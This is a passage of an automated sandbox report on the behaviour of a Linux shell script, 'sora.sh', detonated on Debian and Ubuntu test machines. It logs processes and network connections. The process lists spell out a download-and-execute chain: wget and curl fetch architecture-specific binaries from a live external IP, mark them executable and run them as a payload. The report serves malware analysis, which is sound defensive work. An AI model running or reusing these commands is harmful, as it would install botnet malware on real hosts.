US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp

Files

N/A

Analysis: behavioral5

Detonation Overview

Submitted

2024-08-22 21:45

Reported

2024-08-22 21:51

Platform

debian9-mipsel-20240611-en

Max time kernel

247s

Max time network

281s

Command Line

[/tmp/sora.sh]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/robben /tmp/sora.sh N/A

Processes

/tmp/sora.sh

[/tmp/sora.sh]

/usr/bin/wget

[wget http://158.51.127.106/bins/x86_64]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/x86_64]

/bin/cat

[cat x86_64]

/bin/chmod

[chmod +x robben sora.sh systemd-private-da7cf7e49fe04dceaaa96479e5c838d9-systemd-timedated.service-nhhpvM]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/mips]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mips]

/bin/cat

[cat mips]

/bin/chmod

[chmod +x robben sora.sh systemd-private-da7cf7e49fe04dceaaa96479e5c838d9-systemd-timedated.service-nhhpvM]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/mipsel]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mipsel]

/bin/cat

[cat mipsel]

/bin/chmod

[chmod +x robben sora.sh systemd-private-da7cf7e49fe04dceaaa96479e5c838d9-systemd-timedated.service-nhhpvM]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm]

/bin/cat

[cat arm]

/bin/chmod

[chmod +x robben sora.sh]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm5]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm5]

/bin/cat

[cat arm5]

/bin/chmod

[chmod +x robben sora.sh]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm6]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm6]

/bin/cat

[cat arm6]

/bin/chmod

[chmod +x robben sora.sh]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm7]

Network

Country Destination Domain Proto
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp

Files

N/A

Analysis: behavioral6

Detonation Overview

Submitted

2024-08-22 21:45

Reported

2024-08-22 21:50

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

290s

Max time network

298s

Command Line

[/tmp/sora.sh]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/robben /tmp/sora.sh N/A

Processes

/tmp/sora.sh

[/tmp/sora.sh]

/usr/bin/wget

[wget http://158.51.127.106/bins/x86_64]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/x86_64]

/bin/cat

[cat x86_64]

/bin/chmod

[chmod +x config-err-iEKf7O netplan_e2yeal45 robben snap-private-tmp sora.sh ssh-eQSbXsy1sOJZ systemd-private-0548783c80f8493da07979fa7107a630-bolt.service-WnKfox systemd-private-0548783c80f8493da07979fa7107a630-colord.service-WjjxOC systemd-private-0548783c80f8493da07979fa7107a630-ModemManager.service-OWrjsW systemd-private-0548783c80f8493da07979fa7107a630-systemd-resolved.service-ihwtga systemd-private-0548783c80f8493da07979fa7107a630-systemd-timedated.service-hSixl4]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/mips]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mips]

/bin/cat

[cat mips]

/bin/chmod

[chmod +x config-err-iEKf7O netplan_e2yeal45 robben snap-private-tmp sora.sh ssh-eQSbXsy1sOJZ systemd-private-0548783c80f8493da07979fa7107a630-bolt.service-WnKfox systemd-private-0548783c80f8493da07979fa7107a630-colord.service-WjjxOC systemd-private-0548783c80f8493da07979fa7107a630-ModemManager.service-OWrjsW systemd-private-0548783c80f8493da07979fa7107a630-systemd-resolved.service-ihwtga systemd-private-0548783c80f8493da07979fa7107a630-systemd-timedated.service-hSixl4]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/mipsel]

Network

Country Destination Domain Proto
US 158.51.127.106:80 tcp
N/A 224.0.0.251:5353 udp
GB 185.125.188.62:443 tcp
GB 185.125.188.62:443 tcp
US 151.101.1.91:443 tcp
US 1.1.1.1:53 ocp-ingress.fastly.gnome.org udp
US 151.101.1.91:443 ocp-ingress.fastly.gnome.org tcp
GB 89.187.167.5:443 tcp
US 1.1.1.1:53 1527653184.rsc.cdn77.org udp
US 1.1.1.1:53 1527653184.rsc.cdn77.org udp
US 158.51.127.106:80 tcp
GB 84.17.50.8:443 1527653184.rsc.cdn77.org tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 1.1.1.1:53 connectivity-check.ubuntu.com udp
US 1.1.1.1:53 connectivity-check.ubuntu.com udp
US 91.189.91.96:80 connectivity-check.ubuntu.com tcp
US 1.1.1.1:53 daisy.ubuntu.com udp
US 158.51.127.106:80 tcp

Files

N/A

Analysis: behavioral7

Detonation Overview

Submitted

2024-08-22 21:45

Reported

2024-08-22 21:50

Platform

ubuntu2004-amd64-20240611-en

Max time kernel

223s

Max time network

292s

Command Line

[/tmp/sora.sh]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/robben /tmp/sora.sh N/A

Processes

/tmp/sora.sh

[/tmp/sora.sh]

/usr/bin/wget

[wget http://158.51.127.106/bins/x86_64]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/x86_64]

/usr/bin/cat

[cat x86_64]

/usr/bin/chmod

[chmod +x config-err-QtAINi robben snap-private-tmp sora.sh ssh-kLQ2HXMTXL6R systemd-private-5e003a358c0f440a8a70128c0d7df8d1-colord.service-Qdn9Ef systemd-private-5e003a358c0f440a8a70128c0d7df8d1-ModemManager.service-h50iFh systemd-private-5e003a358c0f440a8a70128c0d7df8d1-switcheroo-control.service-LorQBf systemd-private-5e003a358c0f440a8a70128c0d7df8d1-systemd-logind.service-mtTNhf systemd-private-5e003a358c0f440a8a70128c0d7df8d1-systemd-resolved.service-5HrFRh systemd-private-5e003a358c0f440a8a70128c0d7df8d1-systemd-timedated.service-HCpxDg systemd-private-5e003a358c0f440a8a70128c0d7df8d1-upower.service-eCKh8e]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/mips]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mips]

/usr/bin/cat

[cat mips]

/usr/bin/chmod

[chmod +x config-err-QtAINi robben snap-private-tmp sora.sh ssh-kLQ2HXMTXL6R systemd-private-5e003a358c0f440a8a70128c0d7df8d1-colord.service-Qdn9Ef systemd-private-5e003a358c0f440a8a70128c0d7df8d1-ModemManager.service-h50iFh systemd-private-5e003a358c0f440a8a70128c0d7df8d1-switcheroo-control.service-LorQBf systemd-private-5e003a358c0f440a8a70128c0d7df8d1-systemd-logind.service-mtTNhf systemd-private-5e003a358c0f440a8a70128c0d7df8d1-systemd-resolved.service-5HrFRh systemd-private-5e003a358c0f440a8a70128c0d7df8d1-upower.service-eCKh8e]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/mipsel]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mipsel]

/usr/bin/cat

[cat mipsel]

/usr/bin/chmod

[chmod +x config-err-QtAINi robben snap-private-tmp sora.sh ssh-kLQ2HXMTXL6R systemd-private-5e003a358c0f440a8a70128c0d7df8d1-colord.service-Qdn9Ef systemd-private-5e003a358c0f440a8a70128c0d7df8d1-ModemManager.service-h50iFh systemd-private-5e003a358c0f440a8a70128c0d7df8d1-switcheroo-control.service-LorQBf systemd-private-5e003a358c0f440a8a70128c0d7df8d1-systemd-logind.service-mtTNhf systemd-private-5e003a358c0f440a8a70128c0d7df8d1-systemd-resolved.service-5HrFRh systemd-private-5e003a358c0f440a8a70128c0d7df8d1-upower.service-eCKh8e]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm]

/usr/bin/cat

[cat arm]

/usr/bin/chmod

[chmod +x config-err-QtAINi robben snap-private-tmp sora.sh ssh-kLQ2HXMTXL6R systemd-private-5e003a358c0f440a8a70128c0d7df8d1-colord.service-Qdn9Ef systemd-private-5e003a358c0f440a8a70128c0d7df8d1-ModemManager.service-h50iFh systemd-private-5e003a358c0f440a8a70128c0d7df8d1-switcheroo-control.service-LorQBf systemd-private-5e003a358c0f440a8a70128c0d7df8d1-systemd-logind.service-mtTNhf systemd-private-5e003a358c0f440a8a70128c0d7df8d1-systemd-resolved.service-5HrFRh systemd-private-5e003a358c0f440a8a70128c0d7df8d1-upower.service-eCKh8e]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm5]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm5]

/usr/bin/cat

[cat arm5]

/usr/bin/chmod

[chmod +x config-err-QtAINi robben snap-private-tmp sora.sh ssh-kLQ2HXMTXL6R systemd-private-5e003a358c0f440a8a70128c0d7df8d1-colord.service-Qdn9Ef systemd-private-5e003a358c0f440a8a70128c0d7df8d1-ModemManager.service-h50iFh systemd-private-5e003a358c0f440a8a70128c0d7df8d1-switcheroo-control.service-LorQBf systemd-private-5e003a358c0f440a8a70128c0d7df8d1-systemd-logind.service-mtTNhf systemd-private-5e003a358c0f440a8a70128c0d7df8d1-systemd-resolved.service-5HrFRh systemd-private-5e003a358c0f440a8a70128c0d7df8d1-upower.service-eCKh8e]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm6]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm6]

/usr/bin/cat

[cat arm6]

/usr/bin/chmod

[chmod +x config-err-QtAINi robben snap-private-tmp sora.sh ssh-kLQ2HXMTXL6R systemd-private-5e003a358c0f440a8a70128c0d7df8d1-colord.service-Qdn9Ef systemd-private-5e003a358c0f440a8a70128c0d7df8d1-ModemManager.service-h50iFh systemd-private-5e003a358c0f440a8a70128c0d7df8d1-switcheroo-control.service-LorQBf systemd-private-5e003a358c0f440a8a70128c0d7df8d1-systemd-logind.service-mtTNhf systemd-private-5e003a358c0f440a8a70128c0d7df8d1-systemd-resolved.service-5HrFRh systemd-private-5e003a358c0f440a8a70128c0d7df8d1-upower.service-eCKh8e]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm7]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm7]

/usr/bin/cat

[cat arm7]

/usr/bin/chmod

[chmod +x config-err-QtAINi robben snap-private-tmp sora.sh ssh-kLQ2HXMTXL6R systemd-private-5e003a358c0f440a8a70128c0d7df8d1-colord.service-Qdn9Ef systemd-private-5e003a358c0f440a8a70128c0d7df8d1-ModemManager.service-h50iFh systemd-private-5e003a358c0f440a8a70128c0d7df8d1-switcheroo-control.service-LorQBf systemd-private-5e003a358c0f440a8a70128c0d7df8d1-systemd-logind.service-mtTNhf systemd-private-5e003a358c0f440a8a70128c0d7df8d1-systemd-resolved.service-5HrFRh systemd-private-5e003a358c0f440a8a70128c0d7df8d1-upower.service-eCKh8e]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/spc]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 158.51.127.106:80 tcp
US 1.1.1.1:53 connectivity-check.ubuntu.com udp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 1.1.1.1:53 connectivity-check.ubuntu.com udp
US 158.51.127.106:80 tcp
US 1.1.1.1:53 connectivity-check.ubuntu.com udp
GB 185.125.190.17:80 connectivity-check.ubuntu.com tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp

Files

N/A